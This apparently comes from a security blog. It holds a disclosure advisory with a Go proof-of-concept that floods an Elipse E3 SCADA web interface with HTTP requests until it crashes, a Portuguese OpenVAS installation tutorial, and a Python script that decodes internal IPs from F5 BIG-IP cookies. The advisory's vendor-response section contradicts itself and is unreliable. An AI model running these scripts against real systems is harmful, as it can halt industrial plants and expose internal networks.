VSLA Security Advisory FIRE-SCADA-DOS-2013-001- Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.

http://seclists.org/fulldisclosure/2014/Jul/69

Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC. From: Mauro Risonho de Paula Assumpção
Date: Tue, 15 Jul 2014 12:18:35 -0300

VSLA Security Advisory FIRE-SCADA-DOS-2013-001:
Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.

LEVEL: EXTREME
In our tests authorized by the customer, we can stop the entire plant.

Published: 10/29/2013
Version: 1.0

Vendor: Elipse (http://www.elipse.com.br/port/index.aspx)
Product: Elipse E3 (http://www.elipse.com.br/port/e3.aspx)
Version affected: 3.x and prior

Product description:
Elipse E3 is a proprietary software.
The E3 is a system of supervision and control processes designed to meet
the current requirements of connectivity, flexibility and reliability,
making it ideal for use in critical systems (SCADA PLC).

Credit: Mauro Risonho de Paula Assumpção aka firebits

Finding 1: Http DoS Requests Flooding Crash Device Vulnerabilities by
‘index.html’ page.
CVE: CVE-2011-4899

Proof of Concept:
Exploit:

// Exploit Http DoS Request for SCADA ATTACK Elipse 3
// Mauro Risonho de Paula Assumpção aka firebits
// mauro.risonho () gmail com
// 29-10-2013 11:42
// Hard lock Dll crash in Windows 2003 SP2 + 20 requests connections
// exploit in Golang (golang.com) C Google
// Exploit Devel in Fedora:
// sudo yum install golang -y
// go run Http-DoS-Request-SCADA-ATTACK-rev1.go

// Exploit Http-DoS-Request-SCADA-ATTACK-rev1.go
package main

import (
“fmt”
“io/ioutil”
“log”
“net/http”
)

func main() {
count := 1
// fmt.Println (“”)
// fmt.Println (” _____.__ ___. .__ __ “)
// fmt.Println (” _/ ____\__|______ ____\_ |__ |__|/ |_ ______ “)
// fmt.Println (” \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ “)
// fmt.Println (” | | | || | \/\ ___/| \_\ \ || | \___ \ “)
// fmt.Println (” |__| |__||__| \___ >___ /__||__| /____ > “)
// fmt.Println (” \/ \/ \/ “)
// fmt.Println (” bits on fire. “)
fmt.Println (“Exploit Http DoS Request for SCADA ATTACK Elipse 3”)
fmt.Println (“Mauro Risonho de Paula Assumpção aka firebits”)
fmt.Println (“29-10-2013 11:42”)
fmt.Println (“mauro.risonho () gmail com”)
fmt.Println (“Hard lock Dll crash in Windows 2003 SP2 + “)
fmt.Println (“20 requests connections per second”)

for {
count += count
//set ip http://192.168.0.1:1681/index.html ->
// Elipse 3 http://

fmt.Println (“Exploit Http DoS Request for SCADA ATTACK Elipse 3”)
fmt.Println (“Mauro Risonho de Paula Assumpção aka firebits”)
fmt.Println (“29-10-2013 11:42”)
fmt.Println (“mauro.risonho () gmail com”)
fmt.Println (“Hard lock Dll crash in Windows 2003 SP2 + “)
fmt.Println (“20 requests connections”)

fmt.Println (“Connected Port 1681…Testing”)
fmt.Println (“Counter Loops: “, count)

res, err := http.Get(“http://192.168.0.1:1681/index.html”;)
if err != nil {
log.Fatal(err)
}
robots, err := ioutil.ReadAll(res.Body)
res.Body.Close()
if err != nil {
log.Fatal(err)
}
fmt.Printf(“%s”, robots)
}
}

Crash 20 Requests Paralels

Vendor Response:
Due to the fact that the component in question is an installation script,
the vendor has stated that the attack surface is too small to warrant
a fix:

“We would be possible for us to communicate the details of the test, so
we can arrange a hotfix.”

VSLA Virtual Security Labs Anywhere recommends installing the hotfix,
hardware/software to be putting in a production environment.

Remediation Steps:
No official fix for these issues will be released for the Elipse.
However, administrators can mitigate these issues defining rules within
a web application firewall (WAF) solution.

Vendor Communication Timeline:
10/24/2013 – Vulnerability disclosed
10/29/2013 – Confirmation to release vulnerabilities
? – Advisory published

References
1. http://www.elipse.com.br/port/e3.aspx

About VSLA Virtual Security Labs Anywhere:
VSLA Virtual Security Labs Anywhere is a research blog on security
the information.
firebitsbr.wordpress.com

Disclaimer:
The information provided in this advisory is provided “as is” without
warranty of any kind. VSLA Virtual Security Labs Anywhere disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. In no event shall
VSLA Virtual Security Labs Anywhere or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
VSLA Virtual Security Labs Anywhere or its suppliers have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.

@firebitsbr

Compilando e Instalando – OpenVAS6 packages + Debian 7

Neste post vou demonstrar como fazer uma instalação a partir do zero, sem ser por svn e sim por packages.

Antes, no entanto, é preciso concluir a instalação do Debian 7 com alguns pacotes necessários para compilar e executar OpenVAS 6.

$ sudo apt-get install nsis alien rpm texlive-latex-extra libqt4-dev g++ libmicrohttpd-dev libxml2-dev libxslt1-dev libxml2-dev libsqlite3-dev doxygen sqlfairy xmltoman sqlite3 gcc make cmake pkg-config libssh-dev gnutls-dev libglib2.0-dev libpcap-dev libgpgme11-dev uuid-dev bison libmicrohttpd5 -y

Depois, precisamos baixar os packages do Openvas6.

$ wget http://wald.intevation.org/frs/download.php/1159/openvas-libraries-5.0.3.tar.gz
$ wget http://wald.intevation.org/frs/download.php/1092/openvas-scanner-3.3.1.tar.gz
$ wget http://wald.intevation.org/frs/download.php/1112/openvas-manager-4.0+beta3.tar.gz
$ wget http://wald.intevation.org/frs/download.php/1140/openvas-administrator-1.2.1.tar.gz
$ wget http://wald.intevation.org/frs/download.php/1116/greenbone-security-assistant-4.0+beta3.tar.gz
$ wget http://wald.intevation.org/frs/download.php/1084/gsd-1.2.2.tar.gz
$ wget http://wald.intevation.org/frs/download.php/1131/openvas-cli-1.1.5.tar.gz

E na sequencia:

1 openvas-libraries
2 openvas-scanner
3 openvas-manager
4 openvas-administrator
5 gsad (greenbone-security-assistant)
6 gsd (greenbone-security-desktop)
7 openvas-cli

1 openvas-libraries

# tar xzvf openvas-libraries-5.0.3.tar.gz
# cd openvas-libraries-5.0.3/
# cmake .
– Configuring the Libraries…
– Install prefix: /usr/local
– checking for module ‘wmiclient>=1.3.14′
– package ‘wmiclient>=1.3.14′ not found
– checking for module ‘libssh>=0.4.5′
– package ‘libssh>=0.4.5′ not found
– Looking for pcap…
– Looking for pcap… /usr/lib/libpcap.so
– Looking for gpgme…
– Looking for gpgme… /usr/lib/libgpgme.so
– Looking for libldap…
– No ldap library found – ldap support disabled
– Did not find libssh via pkg-config, trying alternative approach …
– Found libssh 0.4.5.
– Looking for uuid…
– Looking for uuid… /usr/lib/libuuid.so
– Found Doxygen: /usr/bin/doxygen
– Configuring done
– Generating done
– Build files have been written to: /home/test/openvas/openvas-libraries-5.0.3

# make install
# cd ..

2 openvas-scanner

# tar xzvf openvas-scanner-3.3.1.tar.gz
# cd openvas-scanner-3.3.1/
# cmake .

– Configuring the Scanner…
– Install prefix: /usr/local
– Looking for pcap…
– Looking for pcap… /usr/lib/libpcap.so
– Looking for gpgme…
– Looking for gpgme… /usr/lib/libgpgme.so
– Found Doxygen: /usr/bin/doxygen
– Configuring done
– Generating done
– Build files have been written to: /home/test/openvas/openvas-scanner-3.3.1
# make
# make install
# cd ..

3 openvas-manager

# tar xzvf openvas-manager-4.0+beta3.tar.gz
# cmake .
– Configuring the Manager…
– Install prefix: /usr/local
– Looking for pcap…
– Looking for pcap… /usr/lib/libpcap.so
– Looking for gpgme…
– Looking for gpgme… /usr/lib/libgpgme.so
– Looking for xmltoman…
– Looking for xmltoman… /usr/bin/xmltoman
– Looking for xmlmantohtml… /usr/bin/xmlmantohtml
– Looking for SQLFairy…
– Looking for SQLFairy… /usr/bin/sqlt-diagram, /usr/bin/sqlt
– Configuring done
– Generating done
– Build files have been written to: /home/test/openvas/openvas-manager-4.0+beta3

# make
# make install
# cd ..

4 openvas-administrator

# tar xzvf openvas-administrator-1.2.1.tar.gz
# cd openvas-administrator-1.2.1/
# cmake .
– Configuring the OpenVAS Administrator…
– Install prefix: /usr/local
– Looking for pcap…
– Looking for pcap… /usr/lib/libpcap.so
– Looking for gpgme…
– Looking for gpgme… /usr/lib/libgpgme.so
– Looking for xmltoman…
– Looking for xmltoman… /usr/bin/xmltoman
– Looking for xmlmantohtml… /usr/bin/xmlmantohtml
– Configuring done
– Generating done
– Build files have been written to: /home/test/openvas/openvas-administrator-1.2.1

# make
# make install
# cd ..

5 gsad (greenbone-security-assistant)

# tar xzvf greenbone-security-assistant-4.0+beta3.tar.gz
# cd greenbone-security-assistant-4.0+beta3/
# cmake .
– Configuring greenbone-security-assistant…
– Looking for pkg-config… /usr/bin/pkg-config
– Install prefix: /usr/local
– External XSL transformations, with xsltproc.
– Looking for xmltoman…
– Looking for xmltoman… /usr/bin/xmltoman
– Looking for xmlmantohtml… /usr/bin/xmlmantohtml
– Configuring done
– Generating done
– Build files have been written to: /home/test/openvas/greenbone-security-assistant-4.0+beta3

# make
# make install
# cd ..

6 gsd (greenbone-security-desktop)

# tar gsd-1.2.2.tar.gz
# cd gsd-1.2.2
# cmake .
– Configuring gsd …
– Install prefix: /usr/local
– Looking for xmltoman…
– Looking for xmltoman… /usr/bin/xmltoman
– Looking for xmlmantohtml… /usr/bin/xmlmantohtml
– Configuring done
– Generating done
– Build files have been written to: /home/test/openvas/gsd-1.2.2
# make
# make install
# cd ..

7 openvas-cli

# tar xzvf openvas-cli-1.1.5.tar.gz
# cd openvas-cli-1.1.5
# cmake .
– Configuring openvas-cli …
– Install prefix: /usr/local
– Looking for xmltoman…
– Looking for xmltoman… /usr/bin/xmltoman
– Looking for xmlmantohtml… /usr/bin/xmlmantohtml
– Configuring done
– Generating done
– Build files have been written to: /home/test/openvas/openvas-cli-1.1.5
# make
# make install
# cd ..

Quando a instalação estiver completa, vamos configurar OpenVAS 6, atualizar primeiro o banco de dados com todos os testes e plugins de vulnerabilidades (NVT):

# openvas-nvt-sync

[i] This script synchronizes an NVT collection with the ‘OpenVAS NVT Feed’.
[i] The ‘OpenVAS NVT Feed’ is provided by ‘The OpenVAS Project’.
[i] Online information about this feed: ‘http://www.openvas.org/openvas-nvt-feed.html’.
[i] NVT dir: /usr/local/var/lib/openvas/plugins
[i] Will use rsync
[i] Using rsync: /usr/bin/rsync
[i] Configured NVT rsync feed: rsync://feed.openvas.org:/nvt-feed
OpenVAS feed server – http://openvas.org/
This service is hosted by Intevation GmbH – http://intevation.de/
All transactions are logged.
Please report problems to admin@intevation.de
receiving incremental file list
[…]

Vamos gerar um usuário com privilégios de administrador (para o OpenVAS, não do SO):

# openvasad -c ‘add_user’ -n admin –role=Admin
Enter password: <digite uma senha segura aqui>

Como OpenVAS protege a comunicação entre o scanner e o cliente usando SSL, você deve gerar os certificados usando o script openvas-mkcert que gera uma autoridade de certificação (se já não estiver lá) e o certificado do lado do scanner. Neste caso, ele vai configurar um CA da Alemanha, com informações do projeto OpenVAS e GreenBone (uma das empresas que tem serviços profissionais e pagos, além de contribuir com a comunidade open source com código-fonte e plugins).

# openvas-mkcert
/usr/local/var/lib/openvas/private/CA created
/usr/local/var/lib/openvas/CA created

——————————————————————————-
Creation of the OpenVAS SSL Certificate
——————————————————————————-

This script will now ask you the relevant information to create the SSL certificate of OpenVAS.
Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your OpenVAS daemon will be able to retrieve this information.

CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [DE]:
Your state or province name [none]:
Your location (e.g. town) [Berlin]:
Your organization [OpenVAS Users United]:

——————————————————————————-
Creation of the OpenVAS SSL Certificate
——————————————————————————-

Congratulations. Your server certificate was properly created.

The following files were created:

. Certification authority:
Certificate = /usr/local/var/lib/openvas/CA/cacert.pem
Private key = /usr/local/var/lib/openvas/private/CA/cakey.pem

. OpenVAS Server :
Certificate = /usr/local/var/lib/openvas/CA/servercert.pem
Private key = /usr/local/var/lib/openvas/private/CA/serverkey.pem

Press [ENTER] to exit

Agora vamos gerar o CA no lado do client:

# openvas-mkcert-client -n om -i
Generating RSA private key, 1024 bit long modulus
……………..++++++
…….++++++
e is 65537 (0×10001)

[…]

Vamos inicializar o scanner, pode demorar alguns minutos para carregar todos os plugins de vulnerabilidades – NVT.

# openvassd

Depois de ter concluído o carregamento dos plugins, precisamos para reconstruir o banco de dados com o openvas-manager, para isso, usamos os seguintes comandos:

# touch /usr/local/var/lib/openvas/mgr/tasks.d
# openvasmd –backup
# openvasmd –rebuild

O Openvas 6 usa nmap 5.51:

# wget http://nmap.org/dist/nmap-5.51.6.tgz
# tar xzvf nmap-5.51.6.tg
# cd nmap-5.51.6
# ./configure
# make
# make install

Precisamos verificar se a versão é correta do NMAP:

# nmap -V
Nmap version 5.51.6 ( http://nmap.org )

Agora, vamos inicializar o Openvas modo Administrador:

# openvasad

E depois, vamos inicializar o Openvas modo Manager:

# openvasmd

Também vamos inicializar o GSA (greenbone-security-assistant) para administrar nossa instalação OpenVAS6:

# gsad –http-only –listen=0.0.0.0 -p 9392

Verificando se foi instalado corretamente, através deste script:

# chmod 755 openvas-check-setup
# ./openvas-check-setup –v6

[…]
Step 1: Checking OpenVAS Scanner …
OK: OpenVAS Scanner is present in version 3.3.1.
OK: OpenVAS Scanner CA Certificate is present as /usr/local/var/lib/openvas/CA/cacert.pem.
OK: NVT collection in /usr/local/var/lib/openvas/plugins contains 28194 NVTs.
WARNING: Signature checking of NVTs is not enabled in OpenVAS Scanner.
SUGGEST: Enable signature checking (see http://www.openvas.org/trusted-nvts.html).
Step 2: Checking OpenVAS Manager …
OK: OpenVAS Manager is present in version 4.0+beta3.
OK: OpenVAS Manager client certificate is present as /usr/local/var/lib/openvas/CA/clientcert.pem.
OK: OpenVAS Manager database found in /usr/local/var/lib/openvas/mgr/tasks.db.
OK: Access rights for the OpenVAS Manager database are correct.
OK: sqlite3 found, extended checks of the OpenVAS Manager installation enabled.
OK: OpenVAS Manager database is at revision 58.
OK: OpenVAS Manager expects database at revision 58.
OK: Database schema is up to date.
OK: OpenVAS Manager database contains information about 28194 NVTs.
OK: xsltproc found.
Step 3: Checking OpenVAS Administrator …
OK: OpenVAS Administrator is present in version 1.2.1.
OK: At least one user exists.
OK: At least one admin user exists.
Step 4: Checking Greenbone Security Assistant (GSA) …
OK: Greenbone Security Assistant is present in version 4.0+beta3.
Step 5: Checking OpenVAS CLI …
OK: OpenVAS CLI version 1.1.5.
Step 6: Checking Greenbone Security Desktop (GSD) …
OK: Greenbone Security Desktop is present in Version 1.2.2.
Step 7: Checking if OpenVAS services are up and running …
OK: netstat found, extended checks of the OpenVAS services enabled.
OK: OpenVAS Scanner is running and listening on all interfaces.
OK: OpenVAS Scanner is listening on port 9391, which is the default port.
OK: OpenVAS Manager is running and listening on all interfaces.
OK: OpenVAS Manager is listening on port 9390, which is the default port.
OK: OpenVAS Administrator is running and listening on all interfaces.
OK: OpenVAS Administrator is listening on port 9393, which is the default port.
OK: Greenbone Security Assistant is running and listening on all interfaces.
OK: Greenbone Security Assistant is listening on port 9392, which is the default port.
Step 8: Checking nmap installation …
OK: nmap is present in version 5.51.6.
Step 9: Checking presence of optional tools …
OK: pdflatex found.
OK: PDF generation successful. The PDF report format is likely to work.
OK: ssh-keygen found, LSC credential generation for GNU/Linux targets is likely to work.
OK: rpm found, LSC credential package generation for RPM based targets is likely to work.
OK: alien found, LSC credential package generation for DEB based targets is likely to work.
OK: nsis found, LSC credential package generation for Microsoft Windows targets is likely to work.[…]

Vamos conectar à porta 9392 via browser, através da URL http://localhost:9392:

OpenVAS6 + Debian 7

E por último, ter acesso ao nome de usuário e senha previamente criado no OpenVAS6.

OpenVAS6 - gsad

Referências:

http://www.openvas.org/
http://www.openvas.org/setup-and-start.html
http://www.debian.org/

Exploit Python – F5 BIG-IP Cookie Persistence

Fiz um exploit que comprova a existência da vulnerabilidade no F5 BIG-IP Cookie Persistence como pode ser visto a vulnerabilidade está tanto na porta 80 (http), como na 443 (https):

Captura de tela - 06-05-2013 - 10:49:20

Captura de tela - 06-05-2013 - 10:49:48

Ref: http://www.securityspace.com/smysecure/catid.html?id=20089

Test ID: 20089
Category: Web Servers
Title: F5 BIP-IP Cookie Persistence
Summary: F5 BIP-IP(R) Cookie Persistence
Description: Synopsis :The remote load balancer suffers from an information disclosure
vulnerability.

Description :

The remote host appears to be a F5 BigIP load balancer which encodes
within a cookie the IP address of the actual web server it is acting
on behalf of. Additionally, information after ‘BIGipServer’ is
configured by the user and may be the logical name of the device.
These values may disclose sensitive information, such as internal IP
addresses and names.

Solution:

http://asia.f5.com/solutions/archives/techbriefs/cookie.html

Copyright This script is Copyright (C) 2005 Shavlik Technologies, LLC

Observação: O link http://asia.f5.com/solutions/archives/techbriefs/cookie.html da possível correção, não existe mais.
ToDO: Procurar outra forma de correção

Exploit:

#!/usr/bin/env python
# Mauro Risonho de Paula Assumpcao
# Pentester
# mrpa.security@gmail.com
# twitter @firebitsbr
#
#
# exploit_BIGIP_firebits_rev01
# example string BIGIP : 100733612.18724.0000

import struct
import sys

if len(sys.argv) != 2:
print “Usage: %s encoded_string” % sys.argv[0]
exit(1)

encoded_string = sys.argv[1]
print “\n[*] String to decode: %s\n” % encoded_string

(host, port, end) = encoded_string.split(‘.’)

(a, b, c, d) = [ord(i) for i in struct.pack(“<I”, int(host))]

print “[*] Decoded IP: %s.%s.%s.%s.\n” % (a,b,c,d)

OBS:

Não programo dedicado desde 2005, mas as poucos estou voltando a desenvolver pequenos scripts, na humildade mas vamos que vamos!:) No próximo post, vou tentar explicar, qual nível de problema seria, caso um atacante usasse esse cookie do F5 BIG-IP e possíveis estragos.

@firebitsbr